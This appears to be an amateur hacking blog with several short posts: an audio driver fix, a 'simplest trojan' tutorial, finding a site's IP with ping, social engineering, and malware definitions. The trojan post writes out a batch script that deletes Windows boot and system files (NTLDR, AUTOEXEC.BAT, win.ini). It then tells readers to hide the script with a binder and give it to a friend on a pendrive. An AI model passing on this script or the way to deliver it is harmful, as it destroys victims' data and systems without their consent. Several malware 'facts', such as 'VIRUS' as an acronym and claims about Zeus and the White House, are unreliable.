Friday, 17 April 2015

A simple trick to tackle the problem of "no output audio device installed"


If your windows 8 is being updated to 8.1 & you are facing a problem in which the volume does not work,then dont worryits nor a big deal you can solve it in seconds  :)

All you got to do is :

1) go to the Device Manager and select the volume producing driver in my case its realtek system driver which is the volume source of my system.

2)Double click on it,you will get 4 tabs instantly.

3) Just go to the drivers and uninstall it for the  time being.

4)Now,its the time to reboot your pc once .

5)When it restarts your output audio is ready to provide you realtime music go boom boom again :)


Catch: you must be wondering how did it work ?? although i have uninstalled  it??
           actually you have temporarily uninstalled it,once you reboot or start over the pc,the system
           files are again reconfigured and thus becomes ready to use again.




Saturday, 22 November 2014

simplest trojan in the world

well....

DID YOU EVER IMAGINE YOU COULD CREATE SOMETHING THAT CAN CRASH A COMPUTER IN THE NOTEPAD ITSELF???

if not....see these steps:

1)open note pad

2) type in :    @echo off
                  ATTRIB-R-S-H
                 C:\AUTOEXEC.BAT
                DEL C:\ AUTOEXEC.BAT
               ATTRIB -R-S-H C:\Boot.INI
               DEL C:\NTLDR
               ATTRIB-R-S-H C:\windows\win ini
               DEL C: \windows\win.ini

3)save it as a .bat extention
4)use a binder to hide it
5)get a pendrive and send it to your friend
just remember do not execute it n your own system....
enjoy :)


                 

how to find the ip address of a website

well ....the ip address or the internet protocol is basically a 32-bit number that uniquely identify a
network or host or anything ranging from very small to very large.
it is divided into four parts ecah part consists of an octet.that is separated by dots .

suppose i have an ip of: 192.168.123.132

its binary form:110000000101000111101110000100..

well now lets divide it into four parts  :11000000.10101000.01111011.10000100. 


basically when you look into an ip address you must be able to figure out what does that weird no. displaying in your cmd(generally) means ...well the again we divide the ip address into two parts :
192.168.123:is the network address 
and the last part 132: is the host address.

now something every one should know that ..there are all total 3 classes of networks

1) class A network ,which has a subnet of 255.0.0.0
2) class B network ,which has a subnet of 255.255.0.0
3) class C network ,which has a subnet of 255.255.255.0

they vary according to network topology

now how do you find an ip address of a web site???

1) open the cmd (command prompt)
2) type in : ping www.google.com ( lets say the target website is google,its all according to you)
3) press enter,then you will get some command lines running down,its your network trying to connect the google 
   server,after 4 or 5 steps,it terminates and shows you the ip address (with 0% data loss)

now ,you can do what ever you want ....   :)




Thursday, 13 November 2014

SOCIAL ENGINEERING

hacks made by the technique of social engineering is very powerful.you dont need to have a vulnerability for this category of hack,these people might might influence you a lot ,so that you share some pesonal information with them!!!


NOW I AM GOING TO TELL YOU SOMETHING WHICH SETS THINGS(SOCIAL ENGINEERING AT ITS BEST)!!

suppose some one wants to know all about you,so he/she might contact some stalkers,their job is to trace you in every possible ways,(when you turn on online in facebook,your frequency of mailing,your personal life etc etc ).if they find any sort of loop holes in any of these,they wont waste
 their time and will enter into it, take advantage of it and will try black mailing you.


this sort of hacking is so powerful that it can break through any security in the world because,unwantedly you are a victim and helping him to carry on with this crime

THIS IS A HACK WHERE REAL LIFE PERSONS ARE INVOLVED,NOT BOTS AND WORMS,BUT PEOPLE SO DO TAKE CARE OF IT PEOPLE!!!!

N.B:anyone might be tracing you BEWARE!!!  :)

Wednesday, 12 November 2014

viruses ,trojans,worms,bots ....


VIRUS : (vital information research under siege) unlike real world viruses these are malicious codes or program written by a programmer that uses the vulnerabilities as loop holes to enter into a system or network.once they enter into a system.or network they rapidly expand and ultimately effect disastrously .the system configuration itself tends to act as a fuel,so once entered unnoticed then
BEWARE you are a victim,

WORMS:these are some what like viruses but not exactly similar,the fact that worms become too dangerous due to the nature of self propagating.it does not need external source for itts propagation.
they are used to monitor your computer and systems and steal vital data from your computer.

TROJANS : they are used to steal data bases,crash systems,make use your vulnerabilities against you

BOTS:bots are powerful program,that enters your computer and makes your computer a zombie.
in short your system becomes a puppet in the hands of hackers ,this could sometimes freeze your  system launch appliations and can do what ever the hacker likes.


did you know??
the very first worm that was created  was MORRIS worm,as at that time no anti-virus could detect this new species of malware.it went viral ,and possibly caused a damage of several millions.

two most powerful bots ever used are zeus bot and spyeye bot,they are known to have effect the white house systems and caused a heavy damage
it was a visual c++ program you if want to study the code then it is available over GITHUB(all the files neessary).


in my later posts i will discuss some techniques on "how to hack".....
catch you later  :)



hackers world

[Before i begin my blog i would like to make it clear that the blog "hackomania" is totally for educational purposes and i wont be responsible for any harmful uses of the techniques that i will
discuss over this blog]

thank you
cheers  :)

so lets get started with ....


HACKERS & ITS TYPES :

there are basically three categories of hackers:

1)white hat hacker : one who does hacking with total permission of the agency or a company that he
                                 is associated with.this is legal and no offence is carried out (for security puposes)

2) black hat hacker : one who hacks illegally,they use the vulnerabilities to break in,this category of                                     hacker causes a great damages in every aspect.these kind is known as cyber                                           crime.

3)grey hat hacker : one who uses the vulnerabilities for own benefit and then later reveal it to the host


HOW  TO BECOME A HACKER??

ans) this is a general question that is asked by many people in todays world.the solution to this question is observation and creativity.you should look into vulnerabilities in websites and softwares
and try to detect them (coding skills required).the more you try the more you learn.

there is certain misconception that when you use tools to break in to something(i am talking about hacking tools) you are not a hacker,instead you are called a cracker or a noob in hackers world.

at a beginners stage, try and download hacking tools available(they are of basic types)over the internet and study how these tools are being built and try creating a basic model of the same tool.

sorry to say but there is no short cut,so that you can possibly become a hacker..... :)